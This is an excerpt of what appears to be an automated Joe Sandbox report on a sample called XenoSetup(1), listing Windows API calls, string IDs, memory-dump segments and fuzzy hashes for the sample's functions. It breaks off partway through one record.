                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 2148572870-0
                                                                                      • Opcode ID: a1a8b6df85f8b1f67b141d6829855a006498879ac026b4ebc0b62d72ae7bd4a4
                                                                                      • Instruction ID: a76e84ee637ddb8338bd3ab8dcf4d17923b707d28ee8adad3ac945711d1694b4
                                                                                      • Opcode Fuzzy Hash: a1a8b6df85f8b1f67b141d6829855a006498879ac026b4ebc0b62d72ae7bd4a4
                                                                                      • Instruction Fuzzy Hash: 56F08C72A00229BBCB306AA1DD4CDDF7F7DFF417A1B004121B64AD6014D63A8546C7A0
                                                                                      APIs
                                                                                        • Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0
                                                                                        • Part of subcall function 00FEB92D: _wcsrchr.LIBVCRUNTIME ref: 00FEB944
                                                                                      • _wcslen.LIBCMT ref: 00FEC197
                                                                                      • _wcslen.LIBCMT ref: 00FEC1DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$_wcsrchr
                                                                                      • String ID: .exe$.rar$.sfx
                                                                                      • API String ID: 3513545583-31770016
                                                                                      • Opcode ID: f97c7081e895efe8ca8c2e40df194ddba856aa64214cb2c999f1c4ff04806fe5
                                                                                      • Instruction ID: c585a2848ce7c8d924adf757f259b55d42571af78f35850827e8614d5803f0d1
                                                                                      • Opcode Fuzzy Hash: f97c7081e895efe8ca8c2e40df194ddba856aa64214cb2c999f1c4ff04806fe5
                                                                                      • Instruction Fuzzy Hash: 2C4128229043D595C736AF768801A7BB3A8EF41764F14090EFAC1AB192EB584D83F3D5
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00FFCE9D
                                                                                        • Part of subcall function 00FEB690: _wcslen.LIBCMT ref: 00FEB696
                                                                                      • _swprintf.LIBCMT ref: 00FFCED1
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                      • SetDlgItemTextW.USER32(?,00000066,0102946A), ref: 00FFCEF1
                                                                                      • EndDialog.USER32(?,00000001), ref: 00FFCFFE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                      • String ID: %s%s%u
                                                                                      • API String ID: 110358324-1360425832
                                                                                      • Opcode ID: 075e908f95aeeec1a0ce51942e31ad960bcac30e898c355662d1e66180e0730c
                                                                                      • Instruction ID: 6f83ff3ba21f73fb23bcb4c4a9bac19b63f2dd4117c2230f8d22b1c2380d58c7
                                                                                      • Opcode Fuzzy Hash: 075e908f95aeeec1a0ce51942e31ad960bcac30e898c355662d1e66180e0730c
                                                                                      • Instruction Fuzzy Hash: D84182B190026DAADF219B90CC45EFE77BCEF05310F4080A6FB49E7055EE759A449F61
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00FEBB27
                                                                                      • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00FEA275,?,?,00000800,?,00FEA23A,?,00FE755C), ref: 00FEBBC5
                                                                                      • _wcslen.LIBCMT ref: 00FEBC3B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$CurrentDirectory
                                                                                      • String ID: UNC$\\?\
                                                                                      • API String ID: 3341907918-253988292
                                                                                      • Opcode ID: de1483b2fc9f7cd0f23c5087bb1e9d73db680b7d482d2222dbae5117842cb6cd
                                                                                      • Instruction ID: 309056cca2d21103355337beca041d9b8c9f7b77e873284f67aa0ce09b61a47b
                                                                                      • Opcode Fuzzy Hash: de1483b2fc9f7cd0f23c5087bb1e9d73db680b7d482d2222dbae5117842cb6cd
                                                                                      • Instruction Fuzzy Hash: 5F41D73180429AA6CF22AF66CC01EEB7779BF40364F244466F554B7161EF74ED90EB50
                                                                                      APIs
                                                                                      • LoadBitmapW.USER32(00000065), ref: 00FFB6ED
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00FFB712
                                                                                      • DeleteObject.GDI32(00000000), ref: 00FFB744
                                                                                      • DeleteObject.GDI32(00000000), ref: 00FFB767
                                                                                        • Part of subcall function 00FFA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6D5
                                                                                        • Part of subcall function 00FFA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6EC
                                                                                        • Part of subcall function 00FFA6C2: LoadResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA703
                                                                                        • Part of subcall function 00FFA6C2: LockResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA712
                                                                                        • Part of subcall function 00FFA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FFB73D,00000066), ref: 00FFA72D
                                                                                        • Part of subcall function 00FFA6C2: GlobalLock.KERNEL32(00000000), ref: 00FFA73E
                                                                                        • Part of subcall function 00FFA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FFA762
                                                                                        • Part of subcall function 00FFA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FFA7A7
                                                                                        • Part of subcall function 00FFA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00FFA7C6
                                                                                        • Part of subcall function 00FFA6C2: GlobalFree.KERNEL32(00000000), ref: 00FFA7CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                      • String ID: ]
                                                                                      • API String ID: 1797374341-3352871620
                                                                                      • Opcode ID: 47099e09ad5c60f1286a9311b266c4b701d149c04036b96aa5eca0f2dc0c2626
                                                                                      • Instruction ID: df37bae3ad9e92201f8eb4c31317a0e5cabe9f9922c9686c77a0723560343787
                                                                                      • Opcode Fuzzy Hash: 47099e09ad5c60f1286a9311b266c4b701d149c04036b96aa5eca0f2dc0c2626
                                                                                      • Instruction Fuzzy Hash: B0016677900119A7C72277348D89A7F7AB9AFC0762F180011FF00E73A5DF7A8C056661
                                                                                      APIs
                                                                                        • Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
                                                                                        • Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370
                                                                                      • EndDialog.USER32(?,00000001), ref: 00FFD64B
                                                                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FFD661
                                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FFD675
                                                                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00FFD684
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: RENAMEDLG
                                                                                      • API String ID: 445417207-3299779563
                                                                                      • Opcode ID: c1c04d493b50036a393afa1163415d63b60cb3daab5516f651a3515b1bbd7c5e
                                                                                      • Instruction ID: e9cc4c1bf382d24149e7ceda0dab8abc59832620a102d073fed7041bdf7a09d9
                                                                                      • Opcode Fuzzy Hash: c1c04d493b50036a393afa1163415d63b60cb3daab5516f651a3515b1bbd7c5e
                                                                                      • Instruction Fuzzy Hash: F4012D336852187BD2214F649E49F77775EFF5AB11F110101F385E6098C6A79804A779
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01007E24,00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002), ref: 01007E93
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01007EA6
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,01007E24,00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002), ref: 01007EC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 3d42506672de637d645e9cd0b93dc3ab77de81d3329e239ccf52660ef71cf265
                                                                                      • Instruction ID: 81687018c71e0c06a2226c4a84f8ce705bf31ab3ed6c1b2236a95d5405187e7d
                                                                                      • Opcode Fuzzy Hash: 3d42506672de637d645e9cd0b93dc3ab77de81d3329e239ccf52660ef71cf265
                                                                                      • Instruction Fuzzy Hash: B3F0C831A01208BBEB229FA4DC09B9EBFF5FF44711F0040A9F985A6154CB7E9D40CB90
                                                                                      APIs
                                                                                        • Part of subcall function 00FF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
                                                                                        • Part of subcall function 00FF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FEF2E4
                                                                                      • GetProcAddress.KERNEL32(010281C8,CryptUnprotectMemory), ref: 00FEF2F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                      • API String ID: 2141747552-1753850145
                                                                                      • Opcode ID: 2bb8bc571f4738933ef6e428d0f013cbc64b747abc0de2aaa2cc766a77c0cdfc
                                                                                      • Instruction ID: 1858cf7f4b0a64e28a93cba5d41377d0a891bec7b28d561d09207097f41c5e9f
                                                                                      • Opcode Fuzzy Hash: 2bb8bc571f4738933ef6e428d0f013cbc64b747abc0de2aaa2cc766a77c0cdfc
                                                                                      • Instruction Fuzzy Hash: 69E04F72D507419EC7319F369849B017AD47F04734B14882DF0DAAB605DABDD440CB50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 2252061734-0
                                                                                      • Opcode ID: e08c9d9616fd1833a3fc38f71dfacc1884a3ed30847df8213a94fce6f9361f74
                                                                                      • Instruction ID: 6ca3e72c975f2570ad700b0ed9f05ac95d1d0a62e6d2ba739a3b3f1f23e68c0c
                                                                                      • Opcode Fuzzy Hash: e08c9d9616fd1833a3fc38f71dfacc1884a3ed30847df8213a94fce6f9361f74
                                                                                      • Instruction Fuzzy Hash: 3051D271600216AFFB2B9F58D848BAA77A4FF14310F24416EED85472E1D732ED50C790
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0100BF39
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0100BF5C
                                                                                        • Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0100BF82
                                                                                      • _free.LIBCMT ref: 0100BF95
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100BFA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: 2b1dbe15b3ea2d459c2df896dbd533896f36020b33bc59143296e8b8e68b1904
                                                                                      • Instruction ID: 6851dbb584f65db1baa25909c8b2a43fc8d9a3b7aa9fb97bcfec44e775ae5ab2
                                                                                      • Opcode Fuzzy Hash: 2b1dbe15b3ea2d459c2df896dbd533896f36020b33bc59143296e8b8e68b1904
                                                                                      • Instruction Fuzzy Hash: 3501D47A6012127F7722157A5C4CDBB7EBDEEC2AA0714016DFA88C7284EA668C0186B0
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,01021030,00000200,010091AD,0100617E,?,?,?,?,00FED984,?,?,?,00000004,00FED710,?), ref: 0100986E
                                                                                      • _free.LIBCMT ref: 010098A3
                                                                                      • _free.LIBCMT ref: 010098CA
                                                                                      • SetLastError.KERNEL32(00000000,01013A34,00000050,01021030), ref: 010098D7
                                                                                      • SetLastError.KERNEL32(00000000,01013A34,00000050,01021030), ref: 010098E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 9a2f2e4f2be404594726da2c452ae7c1875e2ed102c8a0e4694f3cafb13f2288
                                                                                      • Instruction ID: dbe1c3a2719f6ab20bac0a4b071dc058d31cd836484b534220a33ada517a6a41
                                                                                      • Opcode Fuzzy Hash: 9a2f2e4f2be404594726da2c452ae7c1875e2ed102c8a0e4694f3cafb13f2288
                                                                                      • Instruction Fuzzy Hash: 4601FE35245602E7F22771386C8495F26A9EBD1678F110135F5DD963C3EE2989014321
                                                                                      APIs
                                                                                        • Part of subcall function 00FF11CF: ResetEvent.KERNEL32(?), ref: 00FF11E1
                                                                                        • Part of subcall function 00FF11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FF11F5
                                                                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FF0F21
                                                                                      • CloseHandle.KERNEL32(?,?), ref: 00FF0F3B
                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00FF0F54
                                                                                      • CloseHandle.KERNEL32(?), ref: 00FF0F60
                                                                                      • CloseHandle.KERNEL32(?), ref: 00FF0F6C
                                                                                        • Part of subcall function 00FF0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00FF1206,?), ref: 00FF0FEA
                                                                                        • Part of subcall function 00FF0FE4: GetLastError.KERNEL32(?), ref: 00FF0FF6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1868215902-0
                                                                                      • Opcode ID: b813a3028b2b55058f4e33c4b9ed1adcaa8f817cf48a6482b53a542a6de802b1
                                                                                      • Instruction ID: 27a9dbdc77b652f7b364f311c4d6e085d36039f581460be59bdffc374e9c526e
                                                                                      • Opcode Fuzzy Hash: b813a3028b2b55058f4e33c4b9ed1adcaa8f817cf48a6482b53a542a6de802b1
                                                                                      • Instruction Fuzzy Hash: C3017172500744EFC7329B64D884BD6FBE9FF08720F000929F2AB961A5CB7A7A44DB50
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0100C817
                                                                                        • Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
                                                                                        • Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4
                                                                                      • _free.LIBCMT ref: 0100C829
                                                                                      • _free.LIBCMT ref: 0100C83B
                                                                                      • _free.LIBCMT ref: 0100C84D
                                                                                      • _free.LIBCMT ref: 0100C85F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 6607152423336f63135b80aedbbe929a8fd4b9ad021690def581a17a3009183e
                                                                                      • Instruction ID: baa69483eb44c2729facebc77b293f59314b2e3ef5437213892127c7501b2eeb
                                                                                      • Opcode Fuzzy Hash: 6607152423336f63135b80aedbbe929a8fd4b9ad021690def581a17a3009183e
                                                                                      • Instruction Fuzzy Hash: 05F06832910102ABF663EA6CE584C4A7BE9BB10720F54499BF6C8D7585C779F980C754
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00FF1FE5
                                                                                      • _wcslen.LIBCMT ref: 00FF1FF6
                                                                                      • _wcslen.LIBCMT ref: 00FF2006
                                                                                      • _wcslen.LIBCMT ref: 00FF2014
                                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00FEB371,?,?,00000000,?,?,?), ref: 00FF202F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$CompareString
                                                                                      • String ID:
                                                                                      • API String ID: 3397213944-0
                                                                                      • Opcode ID: 2bfa958824575a2e86f86ca32715024d8b76a10ecd45e601ee56e49cd5189383
                                                                                      • Instruction ID: 8f1fa76a6aad8571f853063cd43d7fd95f309ca256ce91a074857fc110d98bbb
